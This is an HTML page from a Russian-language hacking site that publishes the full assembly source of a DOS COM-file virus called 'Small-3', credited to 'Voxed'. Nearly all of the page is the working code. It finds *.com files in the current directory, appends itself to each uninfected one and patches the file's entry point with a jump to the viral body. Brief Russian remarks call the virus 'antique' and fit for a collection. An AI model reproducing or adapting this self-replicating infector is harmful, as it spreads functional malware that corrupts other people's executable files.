<html><head><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=FrontPage.Editor.Document><title>bablo</title></head><body><p><b><font size=5>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Com &#1074;&#1080;&#1088;&#1091;&#1089; Small-3</font></b><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 150%">&nbsp;
<p><font face="Verdana" size="2">COM &#1074;&#1080;&#1088;&#1091;&#1089; Small-3<br>
&#1053;&#1077; &#1073;&#1099;&#1083;&#1086;
&#1074;&#1088;&#1077;&#1084;&#1077;&#1085;&#1080;
&#1087;&#1077;&#1088;&#1077;&#1074;&#1086;&#1076;&#1080;&#1090;&#1100;,
&#1085;&#1091; &#1085;&#1077; &#1095;&#1077;
&#1087;&#1077;&#1088;&#1077;&#1074;&#1077;&#1076;&#1091;
&#1095;&#1077;&#1088;&#1077;&#1079; &#1087;&#1072;&#1088;&#1091;
&#1084;&#1077;&#1089;&#1094;&#1077;&#1074; :)<br>
-----------------------------------------------------------------------------<br>
seg_a segment byte public<br>
assume cs:seg_a, ds:seg_a<br>
org 100h<br>
test proc far<br>
start: db 0E9h<br>
dw 0<br>
entrypoint: call $+3<br>
pop si<br>
sub si, 3<br>
push si<br>
add si,offset oldstart-entrypoint<br>
mov di,100h<br>
movsw ; Mov [si] to es:[di]<br>
movsb ; Mov [si] to es:[di]<br>
pop si<br>
lea dx,ds:[si+FileSize]<br>
mov ah,1Ah<br>
int 21h ; DOS Services ah=function 1Ah<br>
; set DTA(disk xfer area) ds:dx<br>
lea dx,ds:[si+findmask-entrypoint]<br>
mov cx,3Fh<br>
mov ah,4Eh<br>
int 21h ; DOS Services ah=function 4Eh<br>
; find 1st filenam match @ds:dx<br>
loc_1:<br>
lea dx,ds:[si+FileSize+30]<br>
mov ax,3D02h<br>
int 21h ; DOS Services ah=function 3Dh<br>
; open file, al=mode,name@ds:dx<br>
jc loc_2 ; Jump if carry Set<br>
xchg bx,ax<br>
mov ah,3Fh<br>
lea dx,ds:[si+oldstart-entrypoint]<br>
mov cx,3<br>
int 21h ; DOS Services ah=function 3Fh<br>
; read file, bx=file handle<br>
; cx=bytes to ds:dx buffer<br>
jc loc_5 ; Jump if carry Set<br>
cmp byte ptr ds:[si+oldstart-entrypoint],0E9h<br>
je loc_5 ; Jump if equal<br>
xor cx,cx ; Zero register<br>
mov ax,4202h<br>
cwd<br>
int 21h ; DOS Services ah=function 42h<br>
; move file ptr, bx=file handle<br>
; al=method, cx,dx=offset<br>
sub ax,3<br>
mov ds:[si+(NewStart-entrypoint)+1],ax<br>
mov dx,si<br>
mov cx,FileSize<br>
mov ah,40h<br>
int 21h ; DOS Services ah=function 40h<br>
; write file bx=file handle<br>
; cx=bytes from ds:dx buffer<br>
xor cx,cx ; Zero register<br>
mov ax,4200h<br>
cwd<br>
int 21h ; DOS Services ah=function 42h<br>
; move file ptr, bx=file handle<br>
; al=method, cx,dx=offset<br>
mov ah,40h ; '@'<br>
mov cx,3<br>
lea dx,ds:[si+newstart-entrypoint] ; Load effective addr<br>
int 21h ; DOS Services ah=function 40h<br>
; write file bx=file handle<br>
; cx=bytes from ds:dx buffer<br>
loc_5:<br>
mov ah,3Eh<br>
int 21h ; DOS Services ah=function 3Eh<br>
; close file, bx=file handle<br>
loc_2:<br>
mov ah,4Fh<br>
int 21h ; DOS Services ah=function 4Fh<br>
; find next filename match<br>
jc loc_3 ; Jump if carry Set<br>
jmp short loc_1<br>
loc_3:<br>
mov ax,offset start<br>
push ax<br>
retn<br>
OldStart db 090h,90h,0C3h<br>
NewStart db 0E9h<br>
dw 0<br>
FindMask db '*.com'<br>
db 0<br>
FileSize equ ($-entrypoint)<br>
test endp<br>
seg_a ends<br>
end start<br>
<br>
&#1069;&#1090;&#1086;&#1090; &#1074;&#1080;&#1088;&#1091;&#1089; &#1103;
&#1073;&#1099; &#1085;&#1072;&#1079;&#1074;&#1072;&#1083;
&#1072;&#1085;&#1090;&#1080;&#1082;&#1074;&#1072;&#1088;&#1080;&#1072;&#1090;&#1086;&#1084;
:) &#1085;&#1077; &#1086;&#1095;&#1077;&#1085;&#1100;
&#1073;&#1086;&#1083;&#1100;&#1096;&#1080;&#1077;
&#1088;&#1072;&#1079;&#1088;&#1091;&#1096;&#1077;&#1085;&#1080;&#1103;
&#1086;&#1090; &#1085;&#1077;&#1075;&#1086;, &#1085;&#1086; &#1074;
&#1082;&#1086;&#1083;&#1077;&#1082;&#1094;&#1080;&#1102;
&#1087;&#1086;&#1081;&#1076;&#1077;&#1090;.<br>
<br>
<br>
<br>
<br>
&#1072;&#1074;&#1090;&#1086;&#1088;: <font color="#0000FF">Voxed</font><br>
<br>
<br>
</font>
<p>&nbsp; <table cellSpacing=0 cellPadding=2 width=100% border=0><tbody><tr><td><font face=Arial color=#000000 size=1>Copyright � &quot;&nbsp;<a href="http://xs.by.ru">HACK-INFO</a>&quot;&nbsp; &quot; <a href=mailto:info@xakep.dax.ru>info@xakep.dax.ru</a>&quot;<br>&#1055;&#1088;&#1080; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1085;&#1080;&#1080; &#1084;&#1072;&#1090;&#1077;&#1088;&#1080;&#1072;&#1083;&#1086;&#1074; &#1086;&#1073;&#1103;&#1079;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1072; &#1089;&#1089;&#1099;&#1083;&#1082;&#1072; &#1085;&#1072;&nbsp;
        <a target="_blank" href="http://xs.by.ru">http://hack-info.tk </a>.</font></td></tr></tbody></table><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 100%">&nbsp;</p></body></html>